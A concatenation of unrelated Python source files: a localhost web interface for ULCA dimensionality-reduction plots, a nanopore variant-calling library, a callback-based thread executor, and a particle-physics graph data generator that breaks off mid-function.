os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
|
plot.py
|
import copy
import json
import threading
import webbrowser
import numpy as np
import pandas as pd
from enum import IntEnum
from pathlib import Path
from http.server import HTTPServer, SimpleHTTPRequestHandler
from IPython.display import IFrame
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from scipy.spatial.distance import pdist
from ulca_ui.utils.weight_opt import optimize_cost
from ulca_ui.utils.geom_trans import find_best_rotate
class Info():
def __init__(self):
self.verbose = False
self.dr = None
self.X = None
self.y = None
self.w_tg = None
self.w_bg = None
self.w_bw = None
self.alpha = None
self.max_alpha = None
self.Covs = None
self.w_area = {'move': 0.5, 'scale': 0.5},
self.w_dist = {'move': 0.5, 'scale': 0.5}
self.weight_opt_max_iter = 0
self.feat_names = None
self.y_to_name = None
self.new_comp = {}
def _output_as_json(self):
n_feats, n_comps = self.dr.M.shape
# output Z, y, weights as json
weights = {'tg': None, 'bg': None, 'bw': None}
weights['tg'] = [{
'label': int(key),
'val': float(self.w_tg[key])
} for key in self.w_tg]
weights['bg'] = [{
'label': int(key),
'val': float(self.w_bg[key])
} for key in self.w_bg]
weights['bw'] = [{
'label': int(key),
'val': float(self.w_bw[key])
} for key in self.w_bw]
label_to_name = {'alpha': 'Trade-off'}
for key in self.y_to_name:
label_to_name[int(key)] = str(self.y_to_name[key])
Z = self.dr.transform(self.X)
df_emb = pd.DataFrame({
'x': Z[:, 0],
'y': Z[:, 1],
'label': self.y,
'feat_vals': self.X.tolist()
})
emb = json.loads(df_emb.to_json(orient='records'))
data = {
'weights': weights,
'bounds': [{
'label': 'alpha',
'val': float(self.alpha)
}],
'max_upper_bound': float(self.max_alpha),
'emb': emb,
'components': {
'x': list(self.dr.M[:, 0]),
'y':
list(self.dr.M[:, 1] if n_comps >= 2 else np.zeros((n_feats))),
'feat_names': list(self.feat_names)
},
'label_to_name': label_to_name
}
return data
info = Info()
saved_info = {}
class Message(IntEnum):
updateEmb = 0
optimizeWeights = 1
saveResult = 2
loadResult = 3
initialLoad = 4
addNewComp = 5
@property
def key(self):
if self == Message.updateEmb:
return 'updateEmb'
elif self == Message.optimizeWeights:
return 'optimizeWeights'
elif self == Message.saveResult:
return 'saveResult'
elif self == Message.loadResult:
return 'loadResult'
elif self == Message.initialLoad:
return 'initialLoad'
elif self == Message.addNewComp:
return 'addNewComp'
@property
def label(self):
if self == Message.updateEmb:
return 'updateEmb'
elif self == Message.optimizeWeights:
return 'optimizeWeights'
elif self == Message.saveResult:
return 'saveResult'
elif self == Message.loadResult:
return 'loadResult'
elif self == Message.initialLoad:
return 'initialLoad'
elif self == Message.addNewComp:
return 'addNewComp'
class WsHandler(WebSocket):
def _update_emb(self, content):
# read from records and take only x and y positions
Z_prev = np.array(
pd.DataFrame.from_records(content['data']['emb'])[['x', 'y']])
for key in content['data']['weights']:
for w in content['data']['weights'][key]:
getattr(info, f'w_{key}')[w['label']] = w['val']
for bound in content['data']['bounds']:
if bound['label'] == 'alpha':
info.alpha = bound['val']
info.dr = info.dr.fit(info.X,
y=info.y,
w_tg=info.w_tg,
w_bg=info.w_bg,
w_bw=info.w_bw,
Covs=info.Covs,
alpha=info.alpha)
Z = info.dr.transform(info.X)
if Z_prev.shape[0] > 0:
R = find_best_rotate(Z_prev, Z)
info.dr.update_projector(info.dr.M @ R)
Z = info.dr.transform(info.X)
df_emb = pd.DataFrame({
'x': Z[:, 0],
'y': Z[:, 1],
'label': info.y,
'feat_vals': info.X.tolist()
})
emb = json.loads(df_emb.to_json(orient='records'))
n_feats, n_comps = info.dr.M.shape
comps = {
'x': list(info.dr.M[:, 0]),
'y': list(info.dr.M[:,
1] if n_comps >= 2 else np.zeros((n_feats))),
'feat_names': list(info.feat_names)
}
data = {
'weights': content['data']['weights'],
'bounds': [{
'label': 'alpha',
'val': float(info.alpha)
}],
'max_upper_bound': float(info.max_alpha),
'emb': emb,
'components': comps
}
return json.dumps({'action': Message.updateEmb, 'content': data})
def _optimize_weights(self, content):
with_alpha = True
# read from records and take only x and y positions
Z_prev = np.array(
pd.DataFrame.from_records(content['data']['emb'])[['x', 'y']])
for key in content['data']['weights']:
for w in content['data']['weights'][key]:
getattr(info, f'w_{key}')[w['label']] = w['val']
initial_weights = list(info.w_tg.values()) + list(
info.w_bg.values()) + list(info.w_bw.values())
updated_label = content['data']['updated_label']
w_area = info.w_area[content['data']['interaction']]
w_dist = info.w_dist[content['data']['interaction']]
areas = {}
n_labels = len(content['data']['ellipses'])
ellipse_centers = np.zeros((n_labels, 2))
for i, ellipse in enumerate(content['data']['ellipses']):
label = ellipse['label']
# se_ratio[label] = np.abs(ellipse['rx']) + np.abs(ellipse['ry'])
# skip using pi
areas[label] = np.abs(ellipse['rx']) * np.abs(ellipse['ry'])
ellipse_centers[i, 0] = ellipse['cx']
ellipse_centers[i, 1] = ellipse['cy']
center_dists = pdist(ellipse_centers)
new_weights, cost = optimize_cost(
dr=info.dr,
initial_weights=initial_weights,
updated_label=updated_label,
ideal_areas=areas,
ideal_dists=center_dists,
X=info.X,
y=info.y,
with_alpha=with_alpha,
alpha=info.alpha,
Covs=info.Covs,
w_area=w_area,
w_dist=w_dist,
Z_prev=Z_prev,
apply_geom_trans=True,
n_components=2,
method='COBYLA',
options={'maxiter': info.weight_opt_max_iter})
new_w_tg = {}
new_w_bg = {}
new_w_bw = {}
for i, label in enumerate(info.w_tg):
new_w_tg[label] = new_weights[i]
for i, label in enumerate(info.w_bg):
new_w_bg[label] = new_weights[i + n_labels]
for i, label in enumerate(info.w_bw):
new_w_bw[label] = new_weights[i + n_labels * 2]
if with_alpha:
info.alpha = new_weights[-1]
info.w_tg = new_w_tg
info.w_bg = new_w_bg
info.w_bw = new_w_bw
info.dr = info.dr.fit(info.X,
y=info.y,
w_tg=new_w_tg,
w_bg=new_w_bg,
w_bw=new_w_bw,
Covs=info.Covs,
alpha=info.alpha)
Z = info.dr.transform(info.X)
if Z_prev.shape[0] > 0:
R = find_best_rotate(Z_prev, Z)
info.dr.update_projector(info.dr.M @ R)
Z = info.dr.transform(info.X)
df_emb = pd.DataFrame({
'x': Z[:, 0],
'y': Z[:, 1],
'label': info.y,
'feat_vals': info.X.tolist()
})
emb = json.loads(df_emb.to_json(orient='records'))
n_feats, n_comps = info.dr.M.shape
comps = {
'x': list(info.dr.M[:, 0]),
'y': list(info.dr.M[:,
1] if n_comps >= 2 else np.zeros((n_feats))),
'feat_names': list(info.feat_names)
}
weights = {'tg': None, 'bg': None, 'bw': None}
weights['tg'] = [{
'label': int(key),
'val': float(new_w_tg[key])
} for key in new_w_tg]
weights['bg'] = [{
'label': int(key),
'val': float(new_w_bg[key])
} for key in new_w_bg]
weights['bw'] = [{
'label': int(key),
'val': float(new_w_bw[key])
} for key in new_w_bw]
data = {
'weights': weights,
'bounds': [{
'label': 'alpha',
'val': float(info.alpha)
}],
'max_upper_bound': float(info.max_alpha),
'emb': emb,
'components': comps
}
return json.dumps({'action': Message.optimizeWeights, 'content': data})
def _save_result(self, content):
saved_info[content['name']] = copy.deepcopy(info)
return json.dumps({
'action': Message.saveResult,
'content': {
'dataNames': list(saved_info)
}
})
def _load_result(self, content):
info = copy.deepcopy(saved_info[content['name']])
data = info._output_as_json()
return json.dumps({'action': Message.loadResult, 'content': data})
def _initial_load(self):
data = info._output_as_json()
return json.dumps({'action': Message.initialLoad, 'content': data})
def _add_new_component(self, content):
info.new_comp[content['key']] = content['component']
def handleMessage(self):
m = json.loads(self.data)
m_action = m['action']
if m_action == Message.updateEmb:
self.sendMessage(self._update_emb(m['content']))
elif m_action == Message.optimizeWeights:
self.sendMessage(self._optimize_weights(m['content']))
elif m_action == Message.saveResult:
self.sendMessage(self._save_result(m['content']))
elif m_action == Message.loadResult:
self.sendMessage(self._load_result(m['content']))
elif m_action == Message.addNewComp:
self._add_new_component(m['content'])
else:
if info.verbose:
print('received action:', m_action)
def handleConnected(self):
if info.verbose:
print(self.address, 'connected')
self.sendMessage(self._initial_load())
def handleClose(self):
if info.verbose:
print(self.address, 'closed')
class Singleton(object):
def __new__(cls, *args, **kargs):
if not hasattr(cls, '_instance'):
cls._instance = super(Singleton, cls).__new__(cls)
return cls._instance
class Plot(Singleton):
"""Class for calling the ULCA visual interface with a Python script
Parameters
----------
http_port: int, optional, (default=8000)
Port used for HTTP server.
ws_port: int, optional, (default=9000)
Port used for Websocket server.
"""
def __init__(self, http_port=8000, ws_port=9000):
# use singleton and the condition below to avoid conflict due to
# usage of the same html server address
if len(vars(self)) == 0:
self.http_port = http_port
self.html_server = None
self.html_server_thread = None
self.ws_port = ws_port
self.ws_server = None
self.ws_server_thread = None
def plot_emb(self,
dr,
X,
y,
w_tg={},
w_bg={},
w_bw={},
Covs={},
alpha=None,
max_alpha=10,
feat_names=None,
y_to_name={},
w_area={
'move': 0.2,
'scale': 0.8
},
w_dist={
'move': 0.8,
'scale': 0.2
},
weight_opt_max_iter=50,
inline_mode=True):
"""Plot ULCA result.
Parameters
----------
dr: ULCA instance.
ULCA instance after applying fit.
X: array-like of shape(n_samples, n_features)
X used when applying fit with ULCA.
y: array-like of shape (n_samples,)
y used when applying fit with ULCA.
w_tg: array-like of shape (n_groups,) or dictionary
w_tg used when applying fit with ULCA.
w_bg: array-like of shape (n_groups,) or dictionary
w_bg used when applying fit with ULCA.
w_bw: array-like of shape (n_groups,) or dictionary
w_bw used when applying fit with ULCA.
Covs: dictionary, optional, (default={})
Covs used when applying fit with ULCA.
alpha: None or float, optional (default=None)
alpha used when applying fit with ULCA.
max_alpha: float, optional (default=10)
maximum value of alpha that can be selected with the slider in UI.
feat_names: None or list of strings, optional (default=None)
If None, numbers from 0 to n_features are assigned as feature names
shown in UI. Otherwise, a list of feature names is used in UI.
y_to_name: None or dictionary, optional (default=None)
If None, Label_{y_value} is used for each groups's name. Otherwise,
Dictionary item corresponding each y value is used as a group name.
(e.g., y_to_name={0: 'Group X', 1: 'Group Y'})
w_area: dictinary, optional (default {'move': 0.2, 'scale': 0.8})
r_a in Eq. 12 when moving ('move') or scaling ('scale') of the
confidence ellipse is performed.
w_dist: dictinary, optional (default {'move': 0.8, 'scale': 0.2})
r_l in Eq. 12 when moving ('move') or scaling ('scale') of the
confidence ellipse is performed.
weight_opt_max_iter: int, optional (default=50)
# of maximum iterations when optimizing Eq. 12.
inline_mode: bool, optional (default=True)
If True, showing UI with an inline mode (i.e., showing UI in
the Jupyter Notebook's output cell using HTML IFrame).
Otherwise, showing UI in a new windowin in a browser.
Returns
-------
View: IFrame
Examples
-------
from sklearn import datasets, preprocessing
from ulca.ulca import ULCA
>>> # prepare data
>>> dataset = datasets.load_wine()
>>> X = dataset.data
>>> y = dataset.target
>>> X = preprocessing.scale(X)
>>> # prepare ULCA and parameters
>>> ulca = ULCA(n_components=2)
>>> w_tg = {0: 0, 1: 0, 2: 0}
>>> w_bg = {0: 1, 1: 1, 2: 1}
>>> w_bw = {0: 1, 1: 1, 2: 1}
>>> # apply ULCA
>>> ulca = ulca.fit(X, y=y, w_tg=w_tg, w_bg=w_bg, w_bw=w_bw)
"""
# start html server thread
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.directory = Path(__file__).parent
super().__init__(request,
client_address,
server,
directory=self.directory)
def log_message(self, format, *args):
# This is to avoid outputting log messages in notebook
None
# start html server thread
if self.html_server is None:
try:
self.html_server = HTTPServer(('localhost', self.http_port),
HTTPHandler)
except:
print(
'shutdown jupyter kernel using UI before starting to use UI in a new notebook'
)
return
self.html_server_thread = threading.Thread(
target=self.html_server.serve_forever)
self.html_server_thread.daemon = True
self.html_server_thread.start()
# start websocket server thread
if self.ws_server is None:
try:
self.ws_server = SimpleWebSocketServer('', self.ws_port,
WsHandler)
except:
print(
'shutdown jupyter kernel using UI before starting to use UI in a new notebook'
)
return
self.ws_server_thread = threading.Thread(
target=self.ws_server.serveforever)
self.ws_server_thread.daemon = True
self.ws_server_thread.start()
if w_tg == {}:
for label in np.unique(y):
w_tg[label] = 0
if w_bg == {}:
for label in np.unique(y):
w_bg[label] = 1
if w_bw == {}:
for label in np.unique(y):
w_bw[label] = 1
if feat_names is None:
feat_names = list(range(X.shape[1]))
if y_to_name == {}:
for label in np.unique(y):
y_to_name[label] = f'Label {label}'
if alpha is None:
alpha = 1 / dr.get_final_cost()
info.dr = dr
info.X = X
info.y = y
info.w_tg = w_tg
info.w_bg = w_bg
info.w_bw = w_bw
info.alpha = alpha
info.max_alpha = max_alpha if max_alpha > alpha else alpha
info.Covs = Covs
info.w_area = w_area
info.w_dist = w_dist
info.feat_names = feat_names
info.y_to_name = y_to_name
info.weight_opt_max_iter = weight_opt_max_iter
if len(saved_info) == 0:
saved_info['-'] = copy.deepcopy(info)
# load local webpage
url = f'http://localhost:{self.http_port}/'
view = IFrame(src=url, width='100%',
height='500px') if inline_mode else webbrowser.open(url)
return view
def current_info(self):
"""Accessing information the current ULCA result shown in UI.
Returns
-------
Info class instance which has below attributes:
dr
X,
y,
w_tg,
w_bg,
w_bw,
alpha,
max_alpha,
Covs,
w_area,
w_dist,
feat_names,
y_to_name,
weight_opt_max_iter
These attributes correspond to parameters used for plot_emb().
Attributes related to ULCA optimization (w_tg, w_bg, w_bw, alpha) are
updated during the intearctive analysis using UI.
"""
return info
def saved_info(self):
"""Accessing all saved info via saving function in UI.
Returns
-------
Dictionary of Info class instances where key is a name used when saving
and item is the corresponding Info class instances.
'-' is a specical key used to indicate the current Info.
"""
return saved_info
|
variantCallingLib.py
|
#!/usr/bin/env python
"""Library for calling variants
"""
from __future__ import print_function
import sys
import os
import glob
import pandas as pd
import numpy as np
from random import shuffle
from signalAlignLib import SignalAlignment
from alignmentAnalysisLib import CallMethylation
from multiprocessing import Process, Queue, current_process, Manager
from serviceCourse.parsers import read_fasta
from serviceCourse.sequenceTools import reverse_complement
def randomly_select_alignments(path_to_alignments, max_alignments_to_use):
alignments = [x for x in glob.glob(path_to_alignments) if os.stat(x).st_size != 0]
if len(alignments) == 0:
print("[error] Didn't find any alignment files here {}".format(path_to_alignments))
sys.exit(1)
shuffle(alignments)
if len(alignments) < max_alignments_to_use:
return alignments
else:
return alignments[:max_alignments_to_use]
def get_forward_mask(list_of_alignments, suffix):
mask = []
for alignment in list_of_alignments:
if alignment.endswith(".backward.tsv{}".format(suffix)):
mask.append(False)
else:
mask.append(True)
return mask
def get_alignments_labels_and_mask(path_to_alignments, max, suffix=""):
alignments = randomly_select_alignments(path_to_alignments, max)
mask = get_forward_mask(alignments, suffix)
return alignments, mask
def get_reference_sequence(path_to_fasta):
seqs = []
for header, comment, sequence in read_fasta(path_to_fasta):
seqs.append(sequence)
assert len(seqs) > 0, "Didn't find any sequences in the reference file"
if len(seqs) > 1:
print("[NOTICE] Found more than one sequence in the reference file, using the first one")
return seqs[0]
def make_degenerate_reference(input_sequence, positions, forward_sequence_path, backward_sequence_path,
block_size=1):
"""
input_sequence: string, input nucleotide sequence
out_path: string, path to directory to put new sequences with substituted degenerate characters
block_size: not implemented, will be the size of the Ns to add (eg. NN = block_size 2)
:return (subbed sequence, complement subbed sequence)
"""
complement_sequence = reverse_complement(dna=input_sequence, reverse=False, complement=True)
if positions is not None:
t_seq = list(input_sequence)
c_seq = list(complement_sequence)
for position in positions:
t_seq[position] = "X"
c_seq[position] = "X"
t_seq = ''.join(t_seq)
c_seq = ''.join(c_seq)
else:
t_seq = input_sequence
c_seq = complement_sequence
with open(forward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=t_seq))
with open(backward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=c_seq))
return True
def load_variant_call_data(file_path):
data = pd.read_table(file_path,
usecols=(0, 1, 2, 3, 4, 5, 6),
names=['site', 'strand', 'pA', 'pC', 'pG', 'pT', 'read'],
dtype={'site': np.int64,
'strand': np.str,
'pC': np.float64,
'pmC': np.float64,
'phmC': np.float64,
'read': np.str,
})
return data
def symbol_to_base(symbol):
return ["A", "C", "G", "T"][symbol]
def rc_probs(probs):
return [probs[3], probs[2], probs[1], probs[0]]
def call_sites_with_marginal_probs(data, reference_sequence_string, min_depth=0, get_sites=False):
d = load_variant_call_data(data)
reference_sequence_list = list(reference_sequence_string)
candidate_sites = []
add_to_candidates = candidate_sites.append
for g, x in d.groupby("site"):
marginal_forward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
marginal_backward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
assert(len(x['site'].unique()) == 1)
site = x['site'].unique()[0]
if len(x['read']) < min_depth:
continue
for i, read in x.iterrows():
if ((read['read'].endswith(".forward.tsv") and read['strand'] == 't') or
(read['read'].endswith(".backward.tsv") and read['strand'] == 'c')):
direction = True
else:
direction = False
if direction:
marginal_forward_p += read[['pA', 'pC', 'pG', 'pT']]
else:
marginal_backward_p += read[['pA', 'pC', 'pG', 'pT']]
marginal_prob = marginal_forward_p + rc_probs(marginal_backward_p)
normed_marginal_probs = marginal_prob.map(lambda y: y / sum(marginal_prob))
called_base = normed_marginal_probs.argmax()[1]
if called_base != reference_sequence_list[site]:
if get_sites is False:
print("Changing {orig} to {new} at {site} depth {depth}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site, depth=len(x['read'])))
reference_sequence_list[site] = called_base
else:
print("Proposing edit at {site} from {orig} to {new}, \n{probs}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site,
probs=normed_marginal_probs))
difference = normed_marginal_probs.max() - normed_marginal_probs["p" + reference_sequence_list[site]]
print(difference)
add_to_candidates((site, difference))
if get_sites is True:
return candidate_sites
else:
return ''.join(reference_sequence_list)
def aligner(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
alignment = SignalAlignment(**f)
alignment.run()
except Exception, e:
done_queue.put("%s failed with %s" % (current_process().name, e.message))
def variant_caller(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
c = CallMethylation(**f)
c.write()
except Exception, e:
done_queue.put("%s failed with %s" % (current_process().name, e.message))
def run_service(service, service_iterable, service_arguments, workers, iterable_argument):
# setup workers for multiprocessing
work_queue = Manager().Queue()
done_queue = Manager().Queue()
jobs = []
for x in service_iterable:
args = dict({iterable_argument: x},
**service_arguments)
work_queue.put(args)
for w in xrange(workers):
p = Process(target=service, args=(work_queue, done_queue))
p.start()
jobs.append(p)
work_queue.put('STOP')
for p in jobs:
p.join()
done_queue.put('STOP')
def make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=None):
# make paths for working txt files that contain this STEPs Ns
forward_reference = working_folder.add_file_path("forward_reference.txt")
backward_reference = working_folder.add_file_path("backward_reference.txt")
# make N-ed reference sequence for this iteration, writes the strings to files
check = make_degenerate_reference(reference_sequence_string, n_positions,
forward_reference, backward_reference)
assert check, "Problem making degenerate reference"
# perform alignment for this step
alignment_args["forward_reference"] = forward_reference
alignment_args["backward_reference"] = backward_reference
return True
def scan_for_proposals(working_folder, step, reference_sequence_string, list_of_fast5s, alignment_args, workers):
reference_sequence_length = len(reference_sequence_string)
assert reference_sequence_length > 0, "Got empty string for reference sequence."
# proposals will contain the sites that we're going to change to N
proposals = []
for s in xrange(step):
scan_positions = range(s, reference_sequence_length, step)
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string,
alignment_args, n_positions=scan_positions)
assert check, "Problem making degenerate reference for step {step}".format(step=s)
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
# alignments is the list of alignments to gather proposals from
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
if len(alignments) == 0:
print("[error] Didn't find any alignment files here {}".format(working_folder.path))
sys.exit(1)
marginal_probability_file = working_folder.add_file_path("marginals.{step}.calls".format(step=s))
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": scan_positions, "backward": scan_positions},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
# get proposal sites
proposals += call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
min_depth=0, get_sites=True)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
# proposals is a list of lists containing (position, delta_prob) where position in the position in the
# reference sequence that is being proposed to be edited, and delta_prob is the difference in probability
# of the reference base to the proposed base
return proposals
def update_reference_with_marginal_probs(working_folder, proposals, reference_sequence_string, list_of_fast5s,
alignment_args, workers):
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=proposals)
assert check, "[update_reference_with_marginal_probs]: problem making reference files and args dict"
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
marginal_probability_file = working_folder.add_file_path("proposals.calls")
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": proposals, "backward": proposals},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
# get proposal sites
updated_reference_sequence = call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
min_depth=0, get_sites=True)
# clean up
working_folder.remove_file(marginal_probability_file)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
return updated_reference_sequence
|
event_based_asynchronous.py
|
""" Referred to concurrent.futures.thread and concurrent.futures._base """
import itertools
import queue
import time
import threading
from typing import Iterable, Union, Callable, Any
def lprint(*args, **kwargs):
if not hasattr(lprint, 'print_lock'):
lprint.print_lock = threading.Lock()
with lprint.print_lock:
print(*args, **kwargs)
class _WorkItem:
def __init__(self, fn: Callable, callback: Callable, args: Iterable, kwargs: dict):
self.fn = fn
self.callback = callback
self.args = args
self.kwargs = kwargs
def run(self):
res = self.fn(*self.args, **self.kwargs)
if callable(self.callback):
self.callback(res)
class Executor:
_counter = itertools.count().__next__
def __init__(self, max_worker: int = None):
self.max_worker = max_worker or 4
self._work_queue = queue.SimpleQueue()
self._threads = set()
self.lock = threading.Lock()
self._shutdown = False
def submit(self, fn: Callable, callback: Callable, *args, **kwargs):
""" Make a reservation to call `fn` with `callback` """
with self.lock:
work = _WorkItem(fn, callback, args, kwargs)
name = f'[Thread-Exe({self._counter()})]'
self._work_queue.put(work)
self._spawn_executor(name)
def _spawn_executor(self, name: str):
if len(self._threads) < self.max_worker:
thr = threading.Thread(target=self._executor, name=name)
thr.start()
self._threads.add(thr)
def _executor(self):
while True:
work: Union[_WorkItem, None] = self._work_queue.get(block=True)
if work is not None:
work.run()
continue
if self._shutdown:
# Notify other executors too
self._work_queue.put(None)
break
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with self.lock:
self._shutdown = True
# Wake up executor
self._work_queue.put(None)
for thr in self._threads:
thr.join()
return False
def sum_of_pow(num):
""" Time consuming process """
sum = 0
start = time.time()
for i in range(pow(num, num) + 1):
sum += i
time.sleep(0.01)
res = round(time.time() - start, 4), sum
return res
def callback(res: Any):
lprint('Result: ', res)
def main():
# Implemented `callback` instead of `Future`
with Executor() as executor:
for num in [2, 4, 3, 1]:
executor.submit(sum_of_pow, callback, num)
if __name__ == '__main__':
main()
|
data_infer.py
|
import numpy as np
import glob
import os
import uproot as ur
import time
from multiprocessing import Process, Queue, set_start_method
import compress_pickle as pickle
from scipy.stats import circmean
import random
class MPGraphDataGenerator:
"""DataGenerator class for extracting and formating data from list of root files"""
def __init__(self,
pi0_file_list: list,
pion_file_list: list,
cellGeo_file: str,
batch_size: int,
shuffle: bool = True,
num_procs = 32,
preprocess = False,
output_dir = None):
"""Initialization"""
self.preprocess = preprocess
self.output_dir = output_dir
if self.preprocess and self.output_dir is not None:
self.pi0_file_list = pi0_file_list
self.pion_file_list = pion_file_list
assert len(pi0_file_list) == len(pion_file_list)
self.num_files = len(self.pi0_file_list)
else:
self.file_list = pi0_file_list
self.num_files = len(self.file_list)
self.cellGeo_file = cellGeo_file
self.cellGeo_data = ur.open(self.cellGeo_file)['CellGeo']
self.geoFeatureNames = self.cellGeo_data.keys()[1:9]
self.nodeFeatureNames = ['cluster_cell_E', *self.geoFeatureNames[:-2]]
self.edgeFeatureNames = self.cellGeo_data.keys()[9:]
self.num_nodeFeatures = len(self.nodeFeatureNames)
self.num_edgeFeatures = len(self.edgeFeatureNames)
self.meta_features = ['file_name', 'event_ind', 'cluster_ind', 'cluster_E', 'cluster_Pt', 'cluster_EM_PROBABILITY',
'cluster_Eta', 'cluster_Phi', 'cluster_nCells', 'cluster_ENG_CALIB_TOT', 'type']
self.cellGeo_data = self.cellGeo_data.arrays(library='np')
self.cellGeo_ID = self.cellGeo_data['cell_geo_ID'][0]
self.sorter = np.argsort(self.cellGeo_ID)
self.batch_size = batch_size
self.shuffle = shuffle
if self.shuffle: np.random.shuffle(self.file_list)
self.num_procs = num_procs
self.procs = []
if self.preprocess and self.output_dir is not None:
os.makedirs(self.output_dir, exist_ok=True)
self.preprocess_data()
def get_cluster_calib(self, event_data, event_ind, cluster_ind):
""" Reading cluster calibration energy """
cluster_calib_E = event_data['cluster_ENG_CALIB_TOT'][event_ind][cluster_ind]
if cluster_calib_E <= 0:
return None
return np.log10(cluster_calib_E)
def get_nodes(self, event_data, event_ind, cluster_ind):
""" Reading Node features """
cell_IDs = event_data['cluster_cell_ID'][event_ind][cluster_ind]
cell_IDmap = self.sorter[np.searchsorted(self.cellGeo_ID, cell_IDs, sorter=self.sorter)]
nodes = np.log10(event_data['cluster_cell_E'][event_ind][cluster_ind])
global_node = np.log10(event_data['cluster_E'][event_ind][cluster_ind])
# Scaling the cell_geo_sampling by 28
nodes = np.append(nodes, self.cellGeo_data['cell_geo_sampling'][0][cell_IDmap]/28.)
for f in self.nodeFeatureNames[2:4]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
# Scaling the cell_geo_rPerp by 3000
nodes = np.append(nodes, self.cellGeo_data['cell_geo_rPerp'][0][cell_IDmap]/3000.)
for f in self.nodeFeatureNames[5:]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
nodes = np.reshape(nodes, (len(self.nodeFeatureNames), -1)).T
cluster_num_nodes = len(nodes)
return nodes, np.array([global_node]), cluster_num_nodes, cell_IDmap
def get_edges(self, cluster_num_nodes, cell_IDmap):
"""
Reading edge features
Resturns senders, receivers, and edges
"""
edge_inds = np.zeros((cluster_num_nodes, self.num_edgeFeatures))
for i, f in enumerate(self.edgeFeatureNames):
edge_inds[:, i] = self.cellGeo_data[f][0][cell_IDmap]
edge_inds[np.logical_not(np.isin(edge_inds, cell_IDmap))] = np.nan
senders, edge_on_inds = np.isin(edge_inds, cell_IDmap).nonzero()
cluster_num_edges = len(senders)
edges = np.zeros((cluster_num_edges, self.num_edgeFeatures))
edges[np.arange(cluster_num_edges), edge_on_inds] = 1
cell_IDmap_sorter = np.argsort(cell_IDmap)
rank = np.searchsorted(cell_IDmap, edge_inds , sorter=cell_IDmap_sorter)
receivers = cell_IDmap_sorter[rank[rank!=cluster_num_nodes]]
return senders, receivers, edges
def get_meta(self, event_data, event_ind, cluster_ind):
"""
Reading meta data
Returns senders, receivers, and edges
"""
meta_data = []
meta_data.append(event_ind)
meta_data.append(cluster_ind)
for f in self.meta_features[3:-1]:
meta_data.append(event_data[f][event_ind][cluster_ind])
return meta_data
def preprocessor(self, worker_id):
file_num = worker_id
while file_num < self.num_files:
print(f"Proceesing file number {file_num}")
f_name = self.pion_file_list[file_num]
event_tree = ur.open(f_name)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
preprocessed_data = []
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, cluster_num_nodes, cell_IDmap = self.get_nodes(event_data, event_ind, i)
senders, receivers, edges = self.get_edges(cluster_num_nodes, cell_IDmap)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 1], [1,2])
meta_data = [f_name]
meta_data.extend(self.get_meta(event_data, event_ind, i))
meta_data.append('pion')
preprocessed_data.append((graph, target, meta_data))
f_name = self.pi0_file_list[file_num]
event_tree = ur.open(f_name)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, cluster_num_nodes, cell_IDmap = self.get_nodes(event_data, event_ind, i)
senders, receivers, edges = self.get_edges(cluster_num_nodes, cell_IDmap)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 0], [1,2])
meta_data = [f_name]
meta_data.extend(self.get_meta(event_data, event_ind, i))
meta_data.append('pi0')
preprocessed_data.append((graph, target, meta_data))
random.shuffle(preprocessed_data)
